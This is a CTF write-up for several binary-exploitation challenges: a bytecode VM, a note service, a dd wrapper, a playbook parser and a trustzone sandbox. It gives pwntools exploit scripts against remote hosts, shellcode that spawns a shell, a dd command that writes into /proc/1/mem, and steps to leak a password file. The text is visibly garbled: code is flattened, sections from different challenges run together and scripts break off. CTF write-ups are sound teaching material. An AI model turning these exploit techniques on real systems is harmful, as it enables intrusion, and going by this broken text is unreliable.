Basically, the VM struct has one PC register, one stack register and 4 general purpose registers. It has three pages ( page1, page2 and page_dummy) which used to store the bytecodes, page3 is used to store the data.
func is the function pointer which would be called in getFlag:
1 2 3 4 5 6 7 8 9
char *getFlag() { char *v0; // rbx
v0 = getenv("FLAG"); if ( !v0 ) fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr); return v0; }
When I saw this function, I knew my job is overwritting this function pointer.
For the more details how these 4 pages work, let review getDesc and allocNewSegment. In the getDesc function, it would return:
page1 + offset - 0x1000 if the offset is in range [0x1000, 0x20000) ( This is why the initialize value of pc is 0x1000)
page2 + offset - 0x2000 if the offset is in range [0x2000, 0x3000)
pagedummy + offset - 0x3000 if the offset is in range [0x8000, 0x9000)
Otherwise, it would return bufs.data[offset-object_offset]
To figure out where these bufs object come from, check allocNewSegment:
if offset < 0x1000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0xa000, 0xa000+0x200), [0xa000+0x200*n, 0xa000+0x200*(n+1) ) for next times.
if offset >= 0x3000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0x3000, 0x3000+0x200), [0x3000+0x200*n, 0x3000+0x200*(n+1) ) for next times.
That why getDesc whould return bufs.data[bufs.offset - offset] if the offset >= 0x3000.
Check some “interesting” syscall and find the bug
In exec_regVM function, there are two syscalls used for read/write buffer which should be useful for the future exploitation.
And … so I found something interesting. Since I could control the value of n, there is no check to make sure whether n is in bound of regs or not, that means I could also change the value of bufs!
Up to now, everything was clear. I just need to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful to leak memory.
Xrefs the allocNewSegment, I could use syscall 6 of stackVM to call the function with any arguments I want:
defstart(): if args.LOCAL: p = e.process(["inp.masm"]) elif args.GDB: p = gdb.debug([e.path, "inp.masm"], gdbscript=gs) elif args.REMOTE: # python x.py REMOTE <host> <port> host_port = sys.argv[1:] p = remote(host_port[0], int(host_port[1])) p.recvuntil(b'You can run the solver with:\n') cmd = p.recvline().decode() log.info(cmd) ans = popen(f"bash -c '{cmd}'").read() p.sendlineafter(b'Solution? ', ans.encode()) data = open("inp.masm", "rb").read() p.sendlineafter(b"How big is your program? ", str(len(data)).encode()) p.send( data ) return p
rip = 4096
defset_page3_bit(page3, rip, should_be_set): # Apply same logic as in C: v2 = rip - 4089 if rip >= 4096: v2 = rip - 4096 index = v2 >> 3 bit = rip & 7 ifnot (0 <= index < len(page3)): print(f"Warning: v2 >> 3 = {index} out of bounds") return if should_be_set: page3[index] |= (1 << bit) else: page3[index] &= ~(1 << bit)
write_note doesn’t check if offset is larger the note‘s size or not:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
voidwrite_note(int index, int offset, constchar *buffer, int size) { if (index < 0 || index >= note_size) { printf("Index out of range\n"); return; } if (notes[index] == NULL) { printf("Create note first\n"); return; } if (offset < 0) { printf("Offset cannot be less than 0\n"); return; } memcpy(notes[index] + offset, buffer, size); // bug }
Exploit
To make it easy to debug, I do not set GLIBC_TUNABLES='glibc.mem.tagging=1'.
Just write to notes[0] at offset 0x60, we actually change the value of notes[0].
Write \xb8\x02 to make notes[0] point to flag function pointer.
After that, read notes[0] to leak the flag function address.
Write notes[0] at offset 0x18 to change the exit function pointer, we would want it become flag.
Try to change notes[0] to unvaild address -> read note -> segfault -> call flag
This seems quite easy, but what if set GLIBC_TUNABLES='glibc.mem.tagging=1':
The offset is random now, but just only for the highest byte.
defmain(): print('Do you like dd? It is my favorite old-style tool :D\n') line = input(' > What is your favorite dd line?: ').encode() user_input = input(' > Any input to go with it?: ').encode() print('I like it! Let\'s give it a go!') res = subprocess.run(['dd'] + line.split(), input=user_input, capture_output=True) print(res.stdout.decode('utf-8')) print(res.stderr.decode('utf-8')) print('It was fun, bye!')
if __name__ == '__main__': main()
With dd, we can read/write any files, any where we want. But the flag file has random name.
Somehow, the python file on the container is a static binary.
The author did not write about this on the challenge’s discription. From now, I could say it is a guessy challenge.
Since the addresses is not changed, we could use /proc/.../mem trick.
In the config files, I could guess the pid of python process should be 1:
Since keep_caps is true, we should be able to write on /proc/1/mem.
Now, I have to write what and where?
Since line and user_input use default encoding of Python which is utf-8, I could not write any bytes I want, the byte should not be greater than 0x7f.
I found that when pymain_main is going to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
I could say that I was luckly to see this way to deal with this guessy challenge.
#!/usr/bin/env python from pwn import * from time import sleep from os import popen
context.arch = 'amd64' shellcode = asm(""" syscall ret """) escaped = ''.join(f'\\x{b:02x}'for b in shellcode)
host_port = sys.argv[1:] p = remote(host_port[0], int(host_port[1]))
if host_port[0] != "localhost": p.recvuntil(b'You can run the solver with:\n') cmd = p.recvline().decode() log.info(cmd) ans = popen(f"bash -c '{cmd}'").read() p.sendlineafter(b'Solution? ', ans.encode())
pause()
p.sendlineafter(b' > What is your favorite dd line?: ', b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek='+str(0x6BC71E).encode()) p.sendlineafter(b'Any input to go with it?:', shellcode.decode('latin-1').encode())
int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST int nest; // [rsp+1038h] [rbp-18h]
p_idx = idx; nest = 1; len = 251; puts("Enter new playbook in the SOPS language. Empty line finishes the entry."); idx[0] = allocate_playbook(); while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 ) { memset(buf, 0, sizeof(buf)); _isoc99_sscanf(inpbuf, "%s", buf); ... { if ( !strcmp(buf, "ENDSTEP") ) { --p_idx; if ( --nesting_depth < 0 ) { puts("Mismatched STEP and ENDSTEP."); exit(1); } }
We can decrease p_idx twice before running STEP, when p_idx is increased again, it will point to len, that means len would be equal to the return value of allocate_playbook:
#!/usr/bin/env python from pwn import * from os import popen from time import sleep
context.binary = e = ELF("chal")
gs = """ set follow-fork-mode parent # b *0x4021C5 # b *0x402605 # b new_playbook # b *0x401E69 b *0x4025B7 """
defstart(): if args.LOCAL: p = e.process()
elif args.REMOTE: # python x.py REMOTE <host> <port> host_port = sys.argv[1:] p = remote(host_port[0], int(host_port[1])) p.recvuntil(b'You can run the solver with:\n') cmd = p.recvline().decode() log.info(cmd) ans = popen(f"bash -c '{cmd}'").read() p.sendlineafter(b'Solution? ', ans.encode()) return p
defadd(list_data: list[bytes]): p.sendline(b"2") p.recvuntil( b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n') for data in list_data: # if len(data) == 251 or b'\n' in data: # p.send(data) # else: p.sendline(data)
# for i in range(1, 0x50): # add([b"note: " + b'A' * 0x30, b'STEP', # b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n']) # remove(i + 1)
# add([b"note: " + b'A' * 0x30, b'\n']) # execute(1) # for i in range(0x4f): # p.recvuntil(b'Note: ') # if i == 0xa: # p.sendline(p8(i)) # else: # p.send(p8(i)*251)
# sleep(1)
for i inrange(1, 512+30): if i < 3: add([b"note: " + b'A' * 0x30, b'STEP', b'\n']) else: add([b"note: " + b'sh', b'\n']) log.info(str(i))
if args.GDB: gdb.attach(p, gdbscript=gs) pause()
# p.sendline(b'#'*249) # p.sendline(b"2") # p.recvuntil( # b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n') # p.send(b'note: ') # for i in range(250-7): # p.send(b' ')
The docutment only describes how these three trustzones work, not the code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
There are currently three example trustzones you can load:
Name: create_map_shared_x86_64 Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created Description: This trustzone will create and map a shared memory buffer of the desired length into the current process at the specified address.
Name: map_shared_x86_64 Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall Description: This trustzone maps a shared memory buffer specified by the handle into the current process at the specified address.
Name: memprot_x86_64 Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a pointer to a string containing the password.
So I created map_shared_x86_64 and memprot_x86_64 based on what the document says ( I don’t need create_map_shared_x86_64 since create_shared is not trusted syscall):
Since only trustedzone’s bytecodes can call trusted syscall, being able to write these bytecodes is promising for the furture exploitation.
Leak password
Reading the source codes of confirm_password, I could be sure that password file should be in the same directory with the chal file:
1
int password_fd = open("password",O_RDONLY);
I could take advantage of the create_trustzone to read the password and many to any address since the function can open any files in the same directory:
1 2 3 4 5 6
for(unsigned i = 0; i < sizeof(filename); i++) { if(filename[i] == '.' || filename[i] == '/') { filename[i] = '_'; } } int fd = open(filename,O_RDONLY);
But the safe_read check if the address is overlap with trustedzone or not, so it was not easy to read the password:
I chose to allocate a buffer has the size of 0xf000. This buffer should be fixed with TLS address, which I could take advantage of this to leak other segments’ addresses:
Although it was not fixed with TLS as I expected, but I could leak the heap’s address and the JIT (RWX) address:
After have the leaked address, I created a new process which overwrote its trustzone to:
1 2
moveax, 5 int3
This shellcode could let me call map_address directly, to read/write any host’s addresses I want.
Write the shellcode on where?
Up to this point, I leaked heap address, a RWX address.
First time, I had tried to overwrite the opcode of thread 2 to the shellcode spawns shell:
But the leaked RWX address is not fixed with the RIP of the second thread on the remote.
So I tried to leak the stack address of the second thread.
Because the same shellcode and the same execution, I think call-stack of the remote process and the local one should be the same. Overwritting the second thread’s return address might be a good way.
I found that the second thread’s stack address could be leak via a pointer at heap+0x5b00.
After overwritting its return address, the final work to do is making it return.
I saw it check if the local variable ($rbp-0x10) is negative or not.
Up to this point, the variable is always equal to 0 so the thread would never stop the loop ( I think because the end of my first shellcode is jmp $ ).
Changing the variable to -1 ( you could see it in the heap segment and I had leaked the heap address before).
The second thread would return and execute our shellcode.
Final script
This is so f*cking long. I suggest you should debug yourself first.
p.send(data1) p.sendafter(b"CODE_START\n", code1) p.recvuntil(b'new process created with pid 0\n') p.recvuntil(b'0\n') buf0 = int(p.recvline().decode()) log.info(hex(buf0))